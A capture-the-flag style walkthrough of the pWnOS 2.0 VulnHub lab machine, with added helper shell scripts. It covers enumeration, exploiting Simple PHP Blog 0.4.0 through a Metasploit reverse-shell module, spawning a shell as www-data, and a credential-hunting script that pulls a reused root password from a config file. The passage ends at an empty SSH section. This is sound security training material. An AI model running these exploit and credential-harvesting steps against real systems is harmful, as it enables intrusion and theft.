pWnOS 2.0 || VulnHub Walkthrough


Hello everyone! Welcome to my new video. Today, we're exploring a vulnerable machine called "pWnOS 2.0." This machine is part of the pWnOS series and is classified as an easy-level vulnerable VM, making it a good choice for beginners.


To get started, head over to the VulnHub website and download the pwnOS 2.0 image. 

If you're new to VulnHub, be sure to check out our VulnHub playlist for helpful videos that will guide you through the download and setup process.

VulnHub: Vulnerable By Design

VulnHub provides a collection of pre-built vulnerable environments. This resource is designed to help you practice penetration testing and vulnerability assessment skills on a variety of systems.


Let's dive in and start our exploration!


Setting Up

Once we've downloaded the image, the next step is setting up the target machine in VMware.

The download is a 7z archive containing a VMware virtual machine. The catch is that the machine does not use DHCP: it ships with the static IP address 10.10.10.100 already configured, which will not match your lab network unless you happen to use that subnet. This is the first thing we need to fix.

To resolve this, I changed the network configuration to use DHCP instead of the static IP.


Configure the Network to Use DHCP Instead of a Static IP

Configuring the machine to receive an IP address dynamically lets it pick up an address on whatever network the hypervisor gives it, instead of sitting on a 10.10.10.0 subnet that nothing else can reach.

1. Start VMware: First, start VMware and import the VM. After importing, boot it and log in at the console with the credentials below:

  • Username: root
  • Password: root@ISIntS

2. Check the Current IP Address: Once logged in, check the IP address of the target machine (ifconfig works on this Ubuntu 11.04 image). This confirms that the target is currently set to 10.10.10.100.

3. Modify the Network Configuration: Since the attacking machine runs in VirtualBox and the target runs in VMware, both need to end up on the same network.

To achieve this, we change the target's network configuration from a static IP to DHCP, so it automatically receives an address on the host-only network.

4. Edit the Network Interfaces Configuration: To change the static IP to DHCP, edit the /etc/network/interfaces file on the target machine with a text editor.

5. Update the Network Configuration: In that file you will find the stanza for eth0 set to "inet static" with the address 10.10.10.100. Change the stanza to "inet dhcp", remove the static address, netmask and gateway lines that belong to it, save the file, and restart networking (or simply reboot the VM).

Now the machine is set up to use DHCP and will be assigned a host-only address automatically. This lets the attacking machine in VirtualBox (Kali Linux) and the target machine in VMware share one network and communicate.
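Here is a small script that makes the same change non-interactively. It is an added example, not part of the original walkthrough. It assumes the interface is eth0 (the SSH login banner later in this post shows the VM's address on eth0) and that the static stanza carries the usual address, netmask and gateway lines; only the 10.10.10.100 address comes from this machine, the netmask and gateway in the constructed sample are made up.

```sh
#!/bin/sh
# Added example, not code from the original post: switch a static
# /etc/network/interfaces stanza to DHCP, the change made in step 5 above.
# Assumptions not stated on the page: the interface is eth0 and the static
# stanza carries address/netmask/gateway lines. Only 10.10.10.100 comes from
# the page; the netmask and gateway in the sample below are made up.

# interfaces_to_dhcp FILE IFACE
# Rewrite "iface IFACE inet static" to "iface IFACE inet dhcp" and drop the
# static parameters that belong to that stanza. Other stanzas (lo, other
# interfaces) and comments are left untouched. A backup goes to FILE.bak.
interfaces_to_dhcp() {
    file=$1
    iface=$2
    cp "$file" "$file.bak" || return 1
    awk -v ifc="$iface" '
        # the stanza we want to convert
        $1 == "iface" && $2 == ifc && $3 == "inet" && $4 == "static" {
            print "iface " ifc " inet dhcp"
            in_stanza = 1
            next
        }
        # any new stanza keyword ends the block we are rewriting
        $1 == "iface" || $1 == "auto" || $1 == "allow-hotplug" || $1 == "mapping" || $1 == "source" {
            in_stanza = 0
        }
        # static-only parameters no longer apply once the stanza is dhcp
        in_stanza && ($1 == "address" || $1 == "netmask" || $1 == "gateway" ||
                      $1 == "network" || $1 == "broadcast" || $1 == "dns-nameservers") {
            next
        }
        { print }
    ' "$file.bak" > "$file"
}

# uses_dhcp FILE IFACE : exit 0 if FILE now configures IFACE via dhcp
uses_dhcp() {
    grep -Eq "^[[:space:]]*iface[[:space:]]+$2[[:space:]]+inet[[:space:]]+dhcp" "$1"
}

# Demo on a constructed copy of the file (this is not the VM's real file):
tmp=$(mktemp -d)
cat > "$tmp/interfaces" <<'EOF'
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
    address 10.10.10.100
    netmask 255.255.255.0
    gateway 10.10.10.1
EOF
interfaces_to_dhcp "$tmp/interfaces" eth0
uses_dhcp "$tmp/interfaces" eth0 && echo "eth0 now uses dhcp:"
cat "$tmp/interfaces"
rm -rf "$tmp"
# On the VM itself (as root): interfaces_to_dhcp /etc/network/interfaces eth0
# then "ifdown eth0 && ifup eth0" (or reboot) and confirm with "ifconfig eth0".
```

The backup matters more than it looks: if the rewritten file is wrong, the VM comes up with no network at all and you are back at the console, so keep the .bak until you have confirmed the lease with ifconfig.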

Import the Machine to VMware and Configure the Network for VirtualBox Access

Now, let’s import the machine to VMware. However, a problem arises if we use VMware since our attacking machine is set up on VirtualBox. 

Do we need to reinstall it on VMware?  

Fortunately, I have a solution. Follow these steps to find out how.

Before we start, make sure you already have VMware installed. If not, visit this blog and follow the steps to install it without any cost.

Understanding VMware: Installation Guide

This comprehensive guide covers the installation process of VMware. Learn how to set up VMware effectively for your virtualization needs, enhancing your system's capabilities and performance.

Since we have the 7z file, we can extract it using WinRAR (or 7-Zip). After extraction you'll see the files that make up the VMware virtual machine, including its .vmx configuration file and the virtual disk.

To add the virtual machine to VMware Workstation, double-click the .vmx virtual machine file among the extracted files. This launches VMware Workstation with the machine registered and starts it.

There are various settings left to configure, so we need to power off the machine and launch VMware again. 

As you can see, the " pwnOS 2.0 " vulnerable machine is listed in the VMware Manager.

As I previously mentioned, there is no need to reinstall the attacking machine (Kali Linux) on VMware to access the network. Instead, we can change the network settings to use the VirtualBox host-only adapter.

To do this, click on "Edit virtual machine settings."

In the settings window, click on "Network Adapter." Check the box that says "Replicate physical network connection state." This ensures that the network connection state of your host machine is replicated in the virtual machine.

Now, click on the "Configure Adapters" button under the "Bridged" option.

In the adapter settings, select only the "VirtualBox Host-Only Ethernet Adapter" and uncheck any other adapters.

This setting bridges the VMware virtual machine's network connection through the VirtualBox host-only adapter.

Click OK to save the settings and close the configuration window.

By following these steps, you ensure that both your Kali Linux machine (in VirtualBox) and the pWnOS 2.0 machine (in VMware) are connected to the same host-only network, enabling them to communicate with each other.

Now, you can start your pWnOS virtual machine and begin your penetration testing tasks! 

Finally, you'll notice that our vulnerable machine is ready, with a login prompt awaiting.

Let's dive into the fun!


Enumeration


Identifying the IP address

The initial step in our attack is enumeration, which starts with identifying the IP address of the target machine using netdiscover, a tool that sends and listens for ARP traffic on a chosen interface. Open a terminal and run "netdiscover -i" followed by the name of the interface attached to the host-only network, which in this case is "eth1."

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1

 Currently scanning: 192.168.103.0/16   |   Screen View: Unique Hosts                                                                 
                                                                                                                                      
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                      
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.95.1    0a:00:27:00:00:0e      1      60  Unknown vendor                                                                     
 192.168.95.2    08:00:27:c8:36:c8      1      60  PCS Systemtechnik GmbH                                                             
 192.168.95.27   08:00:27:2f:ef:85      1      60  PCS Systemtechnik GmbH  

From the scan results, we've obtained our target IP address: " 192.168.95.27 ."


Conduct a network scan to identify open ports

Next, we'll conduct a port scan to identify open ports, a crucial step in the enumeration process. This tells us the attack surface and lets us plan targeted attacks. We'll use Nmap for this task. Run:

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.95.27

In this command, 

  • " -sC " is used to perform a script scan using the default set of scripts, 
  • while " -sV " enables version detection, allowing us to identify which versions are running on which port.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 02:32 IST
Nmap scan report for 192.168.95.27
Host is up (0.0027s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
|   2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_  256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
|_http-server-header: Apache/2.2.17 (Ubuntu)
|_http-title: Welcome to this Site!
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.83 seconds
                                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ 

After completing the scan, we found two open ports:

  • Port 22/TCP: OpenSSH 5.8p1, a Secure Shell (SSH) service used for remote access. With valid credentials, logging in to the server will be straightforward.
  • Port 80/TCP: Apache httpd 2.2.17, a Hypertext Transfer Protocol (HTTP) service serving web content, which may expose a website or applications worth examining.

Both are old versions from 2011. The default scripts also report that the PHPSESSID session cookie is set without the HttpOnly flag, which is worth remembering if a cross-site scripting bug turns up later, since the cookie would then be readable from script. With this information, we can explore these services for potential vulnerabilities, starting with the web server, which is the more likely route to a foothold.


Enumerate the HTTP service and directory-busting

Now, let's look at the website on port 80. Open a web browser and navigate to the target's IP address.

The page is titled "IsintS." It isn't obvious what the application does, but the three buttons on the left, Home, Register and Login, show it is a user login portal for some web application or service.

The navigation suggests the page's primary function is user account management: a Home page as the main hub, a login for existing users and registration for new ones.

We don't have a username and password, so registering a new account looks like the obvious option.

But it is not a good idea to start creating accounts on a target before understanding the application, and nothing so far suggests an authenticated user gets anything useful. Our priority is to find clues that lead to a foothold.

To dig further, we perform directory busting to uncover directories and pages that are not linked from the visible site.

For this task, we'll use gobuster with the following command.

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.95.27/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt  

Where, 

  • gobuster dir is used to instruct gobuster to perform directory busting. 
  • -u is used to specify the target URL we want to explore. 
  • -w is used to provide the path to the wordlist containing common directory names to try.

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.95.27/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/blog                 (Status: 301) [Size: 313] [--> http://192.168.95.27/blog/]
/login                (Status: 200) [Size: 1174]
/index                (Status: 200) [Size: 854]
/register             (Status: 200) [Size: 1562]
/includes             (Status: 301) [Size: 317] [--> http://192.168.95.27/includes/]
/info                 (Status: 200) [Size: 49882]
/activate             (Status: 302) [Size: 0] [--> http://10.10.10.100/index.php]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
                                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ 

The directory-busting run identified several paths. The most interesting is "/blog", a separate application living under the main site. Two other details are worth noting: "/activate" redirects to http://10.10.10.100/index.php, so the application has the VM's original static address baked into its redirects, and "/info" returns a 49 KB page with nothing linking to it, which is worth a look as well.

Let's explore the "/blog" directory first.

Upon visiting "/blog", we find what appears to be an internal blog for a company called ISINTS.

The header links are likely to lead to the company homepage, contact information, blog statistics, and a login page for restricted content or commenting.

The main content area includes a welcome message, a calendar suggesting regular updates, a search bar, and a list of recent posts. It seems to be a platform for ISINTS to share news and updates with its employees.

Since none of this immediately reveals a vulnerability, we investigate further, starting with the page source: right-click on the page and select "View Page Source." It does not reveal much either.

Now, let's try to fingerprint the software behind the site. I initially used Wappalyzer, but it didn't report much.

Next, we can look at the page's metadata directly.


Inspecting the website's metadata

In Firefox, click the padlock icon on the left side of the address bar, which shows the connection's security status.

A small panel opens with the connection status. Click that entry (it will report the connection is not secure, as the site uses plain HTTP) to see the connection details.

At the bottom of that panel, click "More Information."

This opens the "Page Info" dialog, with General, Media, Permissions and Security tabs.

In the "General" tab, the Meta section lists a tag named "generator" whose value is "Simple PHP Blog 0.4.0."

Knowing the exact application and version is very useful for identifying known vulnerabilities. It is also a reminder that a generator tag is free information for an attacker; stripping it from a production site costs nothing.
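The same value can be pulled from the command line, which is handy when you are checking many hosts. The script below is an added example, not part of the original post: it assumes curl is installed on the attacking machine, and the blog URL in the usage comment is the one from this walkthrough. The HTML it runs on by default is a constructed sample, not the real page.

```sh
#!/bin/sh
# Added example, not code from the original post: pull the <meta name="generator">
# value out of a page from the shell instead of through the Page Info dialog.

# extract_generator : read HTML on stdin, print the generator meta content.
# Exit 0 when found, 1 when the page has no generator tag. Attribute order
# (name before or after content) and letter case do not matter.
extract_generator() {
    tr '\n' ' ' | awk -v q="'" '
        BEGIN {
            namere = "name[[:space:]]*=[[:space:]]*[\"" q "]?generator[\"" q "]?"
            contre = "content[[:space:]]*=[[:space:]]*[\"" q "][^\"" q "]*[\"" q "]"
            found = 0
        }
        {
            html = $0
            lower = tolower(html)
            # walk every <meta ...> tag in the document
            while (match(lower, /<meta[^>]*>/)) {
                s = RSTART; l = RLENGTH
                tag = substr(html, s, l)
                ltag = tolower(tag)
                if (ltag ~ namere && match(ltag, contre)) {
                    val = substr(tag, RSTART, RLENGTH)
                    # strip "content=" and the quotes, keeping the original case
                    sub("^[^=]*=[[:space:]]*[\"" q "]", "", val)
                    sub("[\"" q "]$", "", val)
                    print val
                    found = 1
                    exit
                }
                html = substr(html, s + l)
                lower = substr(lower, s + l)
            }
        }
        END { if (!found) exit 1 }'
}

# page_generator URL : fetch the page with curl and extract the tag
# (assumes curl is available; -f makes HTTP errors fail the pipeline)
page_generator() {
    curl -fsS "$1" | extract_generator
}

# Demo on a constructed HTML fragment (not the real blog page):
printf '<html><head>\n<meta charset="utf-8">\n<meta name="generator"\n      content="Simple PHP Blog 0.4.0">\n</head></html>' \
    | extract_generator
# Against the target from this walkthrough you would run:
#   page_generator http://192.168.95.27/blog/
```

Because the function lowercases a copy for matching but prints from the original, the version string comes back exactly as the site emits it, which is what you want to paste into searchsploit.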


Identifying known vulnerabilities using Searchsploit

To determine if " Simple PHP Blog 0.4.0 " has any known vulnerabilities, let’s use searchsploit , as older versions of web applications often have publicly documented and exploitable vulnerabilities.

┌──(kali㉿kali)-[~]
└─$ searchsploit Simple PHP blog 0.4.0                                    
------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                        |  Path
------------------------------------------------------------------------------------------------------ ---------------------------------
Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities                      | cgi/webapps/26463.txt
Simple PHP Blog 0.4 - 'preview_cgi.php' Multiple Cross-Site Scripting Vulnerabilities                 | cgi/webapps/26461.txt
Simple PHP Blog 0.4 - 'preview_static_cgi.php' Multiple Cross-Site Scripting Vulnerabilities          | cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 - Multiple Remote Exploits                                                      | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)                                         | php/webapps/16883.rb
------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
                                                                                                                                        
┌──(kali㉿kali)-[~]
└─$ 

The searchsploit results list five entries. Three are cross-site scripting issues; I will not pursue those here, since XSS needs a victim in the loop and does not by itself give us code execution on the server.

Our goal is full control of the target, so we focus on the remote command execution entries.


Foothold

From the searchsploit results, we see that there is a remote code execution exploit available for " Simple PHP Blog 0.4.0 " that can be performed using the Metasploit Framework (MSF console) .


Exploiting Simple PHP Blog 0.4.0 using the Metasploit Framework

To proceed, search for the MSF console in the Kali Linux menu and launch it (or run msfconsole in a terminal).

The console will take a moment to initialize, and once it's up, you’ll be presented with the MSF shell .

First, search for available modules related to " Simple PHP Blog 0.4.0 " within the MSF console

msf6 > search Simple PHP Blog 0.4.0

Matching Modules
================

   #  Name                                      Disclosure Date  Rank       Check  Description
   -  ----                                      ---------------  ----       -----  -----------
   0  exploit/unix/webapp/sphpblog_file_upload  2005-08-25       excellent  Yes    Simple PHP Blog Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/sphpblog_file_upload

msf6 > 

Here, we find the relevant module, exploit/unix/webapp/sphpblog_file_upload, the file upload exploit for Simple PHP Blog. Select it:

msf6 > use 0
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/sphpblog_file_upload) >

Loading the module selects a default payload for us (php/meterpreter/reverse_tcp). Next, review the module options to see which parameters must be configured.

msf6 exploit(unix/webapp/sphpblog_file_upload) > options 

Module options (exploit/unix/webapp/sphpblog_file_upload):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /sphpblog        yes       Sphpblog directory path
   VHOST                     no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/sphpblog_file_upload) >

Here, we set the target host (RHOSTS), the URI (the directory the blog lives in, which is /blog on this target rather than the default /sphpblog), and the local host (LHOST), the Kali machine's host-only address that the reverse shell will connect back to.

msf6 exploit(unix/webapp/sphpblog_file_upload) > set RHOSTS 192.168.95.27
RHOSTS => 192.168.95.27                                                                                                                 
msf6 exploit(unix/webapp/sphpblog_file_upload) > set URI /blog                                                                          
URI => /blog                                                                                                                            
msf6 exploit(unix/webapp/sphpblog_file_upload) > set LHOST 192.168.95.3                                                                 
LHOST => 192.168.95.3                                                                                                                   
msf6 exploit(unix/webapp/sphpblog_file_upload) >

After configuring these settings, run the exploit. 

msf6 exploit(unix/webapp/sphpblog_file_upload) > run                                                                                    
                                                                                                                                        
[*] Started reverse TCP handler on 192.168.95.3:4444                                                                                    
[+] Successfully retrieved hash: $1$weWj5iAZ$NU4CkeZ9jNtcP/qrPC69a/                                                                     
[+] Successfully removed /config/password.txt                                                                                           
[+] Successfully created temporary account.                                                                                             
[+] Successfully logged in as AqtMVI:zr1XW6                                                                                             
[+] Successfully retrieved cookie: u0elenfkmm4vkp8g136ff5ijd2                                                                           
[+] Successfully uploaded OsojrdYAcmtO4Kz0z53k.php                                                                                      
[+] Successfully uploaded zsFx5K3T2fHgn8HxX7bW.php                                                                                      
[+] Successfully reset original password hash.                                                                                          
[+] Successfully removed /images/OsojrdYAcmtO4Kz0z53k.php                                                                               
[*] Calling payload: /images/zsFx5K3T2fHgn8HxX7bW.php                                                                                   
[*] Sending stage (39927 bytes) to 192.168.95.27                                                                                        
[*] Meterpreter session 1 opened (192.168.95.3:4444 -> 192.168.95.27:33063) at 2024-05-27 03:01:56 +0530                                

Metasploit starts a reverse TCP handler on the attacking machine and then walks through the chain the output shows: it reads the blog's password hash from config/password.txt, deletes that file, creates a temporary account and logs in with it, uploads PHP files through the blog's image upload, restores the original password hash, and calls the uploaded payload, which connects back and opens a Meterpreter session. Finally it removes the payload file:

[+] Successfully removed /images/zsFx5K3T2fHgn8HxX7bW.php

meterpreter >

With the Meterpreter session open, we have command execution on the target as the web server user and can move on to post-exploitation: privilege escalation, data extraction, and so on. Note that the module could write into config and images under the blog directory only because those paths are writable by the web server; the directory listing later in this post shows just how permissive they are.


Post-Exploitation

To interact directly with the target system’s command line, you can use the shell command within Meterpreter. This will give you a more traditional command-line interface. 

meterpreter > shell
Process 2780 created.                                                                                                                   
Channel 0 created.                                                                                                                      
sh: getcwd() failed: No such file or directory                                                                                          
sh: getcwd() failed: No such file or directory                                                                                                                                                                   
     

After running shell, there is no prompt, only the two getcwd() errors. They mean the shell's current working directory has been deleted from disk, so the shell cannot resolve its own path. That does not stop commands from running, so let's verify with a simple one:

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

The id command answers, confirming that commands are executed and that we are www-data, the account Apache runs as; the shell is functional, it just has no prompt and is not interactive.

To make it usable, I upgraded the shell to a pseudo-terminal with Python.

which python                                                                                                                             
sh: getcwd() failed: No such file or directory /usr/bin/python                                                                           
                                                                                                                                                                                                                          
python -c "import pty;pty.spawn('/bin/bash')"                                                                                           
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory                     
www-data@web:$ 

The prompt www-data@web:$ confirms we now have an interactive shell as www-data, the web server's service account. The getcwd error will keep appearing until we cd to an absolute path such as /.

A web-server account is unprivileged, so to get a proper login on the box we need valid credentials.


Locate the Database Credentials

Since the web server has a login and registration system, it implies a database storing user information, and the PHP code must keep the credentials for that database somewhere. My next step was to locate that connection file.

www-data@web:$ ls -al                                                                                                                   
ls -al                                                                                                                                  
total 0                                                                                                                                 
www-data@web:$ cd ..                                                                                                                     
cd ..                                                                                                                                   
chdir: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory                          
www-data@web:..$ ls -al                                                                                                                 
ls -al                                                                                                                                  
total 356
drwxrwxrwx 10 root     root      4096 May 26 17:32 .
drwxr-xr-x  4 root     root      4096 May  9  2011 ..
-rwxrwxrwx  1 root     root      5952 Dec 28  2004 add.php
-rwxrwxrwx  1 root     root      6183 Dec 27  2004 add_block.php
-rwxrwxrwx  1 root     root      4609 Dec 28  2004 add_cgi.php
-rwxrwxrwx  1 root     root      5781 Jan 18  2005 add_link.php
-rw-rw-rw-  1 root     root      4496 Jan  2  2005 add_static.php
-rwxrwxrwx  1 root     root      1675 Oct 18  2004 add_static_cgi.php
-rwxrwxrwx  1 root     root       403 Nov  8  2004 atom.php
-rwxrwxrwx  1 root     root     10835 Jan  6  2005 categories.php
-rwxrwxrwx  1 root     root      7516 Nov 30  2004 colors.php
-rwxrwxrwx  1 root     root      2519 Nov 30  2004 colors_cgi.php
-rwxrwxrwx  1 root     root      2720 Jan  4  2005 comment_add_cgi.php
-rwxrwxrwx  1 root     root      1778 Oct 18  2004 comment_delete_cgi.php
-rwxrwxrwx  1 root     root     10194 Jan  4  2005 comments.php
drwxrwxrwx  2 www-data www-data  4096 May 26 17:31 config
-rwxrwxrwx  1 root     root      2374 Nov 22  2004 contact.php
-rwxrwxrwx  1 root     root      1560 Jan 18  2005 contact_cgi.php
drwxrwxrwx  3 www-data www-data  4096 May  9  2011 content
-rwxrwxrwx  1 root     root      3039 Oct 18  2004 delete.php
-rwxrwxrwx  1 root     root      3285 Oct 18  2004 delete_static.php
drwxrwxrwx  2 root     root      4096 Jan 18  2005 docs
-rwxrw-rw-  1 root     root      1001 Nov 28  2004 downgrade.php
drwxrwxrwx  2 root     root      4096 Jan 18  2005 flash
-rwxrwxrwx  1 root     root      1201 Sep 20  2004 image_list.php
-rwxrwxrwx  1 root     root      4754 Jan 18  2005 index.php
-rwxrwxrwx  1 root     root      4185 Oct 18  2004 info.php
-rwxrwxrwx  1 root     root      2282 Sep 20  2004 install00.php
-rwxrwxrwx  1 root     root      1530 Sep 20  2004 install01.php
-rwxrwxrwx  1 root     root      2650 Sep 20  2004 install02.php
-rwxrwxrwx  1 root     root      2239 Sep 20  2004 install03.php
-rwxrwxrwx  1 root     root      1558 Sep 20  2004 install03_cgi.php
drwxrwxrwx  3 root     root      4096 Jan 18  2005 interface
drwxrwxrwx 19 root     root      4096 Jan 18  2005 languages
-rwxrw-rw-  1 root     root      2780 Jan  1  2005 languages.php
-rwxrw-rw-  1 root     root      5294 Jan  1  2005 languages_cgi.php
-rwxrwxrwx  1 root     root      1975 Sep 20  2004 login.php
-rwxrwxrwx  1 root     root      1685 Jan 18  2005 login_cgi.php
-rwxrwxrwx  1 root     root      1059 Sep 20  2004 logout.php
-rwxrwxrwx  1 root     root     22803 Nov 29  2004 options.php
-rwxrwxrwx  1 root     root      2358 Oct 18  2004 options_cgi.php
-rwxrwxrwx  1 root     root      7789 Dec 28  2004 preview_cgi.php
-rwxrwxrwx  1 root     root      5984 Dec 27  2004 preview_static_cgi.php
-rwxrwxrwx  1 root     root      2307 Jan  2  2005 rate_cgi.php
-rwxrwxrwx  1 root     root       400 Nov  8  2004 rdf.php
-rwxrwxrwx  1 root     root       908 Sep 20  2004 recompress.php
-rwxrwxrwx  1 root     root       400 Nov  8  2004 rss.php
drwxrwxrwx  2 root     root      4096 May 26 17:15 scripts
-rwxrwxrwx  1 root     root      1348 Sep 20  2004 search.php
-rwxrwxrwx  1 root     root      2025 Sep 20  2004 set_login.php
-rwxrwxrwx  1 root     root      1345 Sep 20  2004 set_login_cgi.php
-rwxrwxrwx  1 root     root     12027 Nov 29  2004 setup.php
-rwxrwxrwx  1 root     root      2886 Nov 29  2004 setup_cgi.php
-rwxrwxrwx  1 root     root      1616 Oct 18  2004 static.php
-rw-rw-rw-  1 root     root      6904 Jan 18  2005 stats.php
drwxrwxrwx  4 root     root      4096 Jan 18  2005 themes
-rwxrwxrwx  1 root     root      3383 Oct 18  2004 themes.php
-rwxrw-rw-  1 root     root      7956 Nov 27  2004 trackback.php
-rw-rw-rw-  1 root     root      1745 Nov 24  2004 trackback_delete_cgi.php
-rwxrw-rw-  1 root     root       922 Jan 18  2005 upgrade.php
-rw-rw-rw-  1 root     root      1489 Jun 17  2004 upload_img.php
-rwxrwxrwx  1 root     root      1929 Oct 18  2004 upload_img_cgi.php
-rwxrwxrwx  1 root     root      9972 Sep 28  2004 upload_img_new.php
www-data@web:..$ cd ..
cd ..
www-data@web:../..$ ls -al
ls -al
total 64
drwxr-xr-x 16 root root  4096 May  7  2011 .
drwxr-xr-x 21 root root  4096 May  7  2011 ..
drwxr-xr-x  2 root root  4096 Apr 21  2011 backups
drwxr-xr-x  8 root root  4096 May  7  2011 cache
drwxrwxrwt  2 root root  4096 May  7  2011 crash
-rw-r--r--  1 root root   177 May  7  2011 index.html
drwxr-xr-x 34 root root  4096 May  7  2011 lib
drwxrwsr-x  2 root staff 4096 Apr 21  2011 local
drwxrwxrwt  4 root root    80 May 26 16:58 lock
drwxr-xr-x 11 root root  4096 May 26 16:58 log
drwxrwsr-x  2 root mail  4096 May  7  2011 mail
-rw-r--r--  1 root root   520 May  7  2011 mysqli_connect.php
drwxr-xr-x  2 root root  4096 May  7  2011 opt
drwxr-xr-x 10 root root   440 May 26 16:59 run
drwxr-xr-x  4 root root  4096 May  7  2011 spool
drwxrwxrwt  2 root root  4096 Apr 21  2011 tmp
drwxr-xr-x  2 root root  4096 May  7  2011 uploads
drwxr-xr-x  4 root root  4096 May  9  2011 www
www-data@web:../..$ 

Moving up the directory tree, I found a file named mysqli_connect.php sitting next to the www directory: outside the web root, which is sensible, but world-readable, so www-data can still read it. The name suggests it holds the MySQL database credentials.

Let's open it.

www-data@web:../..$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

?>www-data@web:../..$ 

Inside mysqli_connect.php are the database username and password:

  • Username: root
  • Password: root@ISIntS

The application connects as the MySQL root account, and the password is the same one we used to log in to the VM's root account during setup. That reuse of a database password as an operating-system password is the real weakness here.
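Browsing directory by directory found the file this time, but on a larger box it is quicker to search for connection files in one go. The functions below are an added example, not part of the original post: they assume a POSIX shell with find, grep and sed, and the sample file they run on is a constructed copy modelled on the mysqli_connect.php above, created in a temporary directory rather than read from the VM.

```sh
#!/bin/sh
# Added example, not code from the original post: hunt for database connection
# settings under a directory tree from a www-data shell. Paths are assumptions;
# on pWnOS 2.0 the file was mysqli_connect.php next to the www directory.

# find_db_creds DIR : print every PHP/inc/ini/conf file under DIR that looks
# like a DB connection helper, followed by its credential-looking lines.
find_db_creds() {
    find "$1" -type f \( -name '*.php' -o -name '*.inc' -o -name '*.ini' -o -name '*.conf' \) 2>/dev/null |
    while IFS= read -r f; do
        if grep -Eiq 'mysqli?_connect|mysqli?_pconnect|new[[:space:]]+(mysqli|pdo)|DB_PASS|db_pass' "$f"; then
            echo "== $f"
            grep -Ein '(DB_|db_)(user|pass|host|name)|password|passwd' "$f" | head -n 10
        fi
    done
}

# php_define_value FILE CONST : print the 'value' from define('CONST', 'value')
# (upper- or lower-case define, single or double quotes), first match only.
php_define_value() {
    sed -nE "s/.*[Dd][Ee][Ff][Ii][Nn][Ee][[:space:]]*\([[:space:]]*['\"]$2['\"][[:space:]]*,[[:space:]]*['\"]([^'\"]*)['\"].*/\1/p" "$1" | head -n 1
}

# Demo on a constructed sample tree (not the VM's real files):
tmp=$(mktemp -d)
mkdir -p "$tmp/www/blog"
cat > "$tmp/mysqli_connect.php" <<'EOF'
<?php # constructed sample modelled on the file found on the VM
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
?>
EOF
printf '<?php echo "hello"; ?>\n' > "$tmp/www/blog/index.php"
find_db_creds "$tmp"
echo "DB password: $(php_define_value "$tmp/mysqli_connect.php" DB_PASSWORD)"
rm -rf "$tmp"
# On the target you would run, for example:  find_db_creds /var
```

Once the password is out, the next check is exactly the one this walkthrough performs by hand: try it against the OS accounts, because a password pulled from a config file is very often reused.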


Access using Secure Shell Service

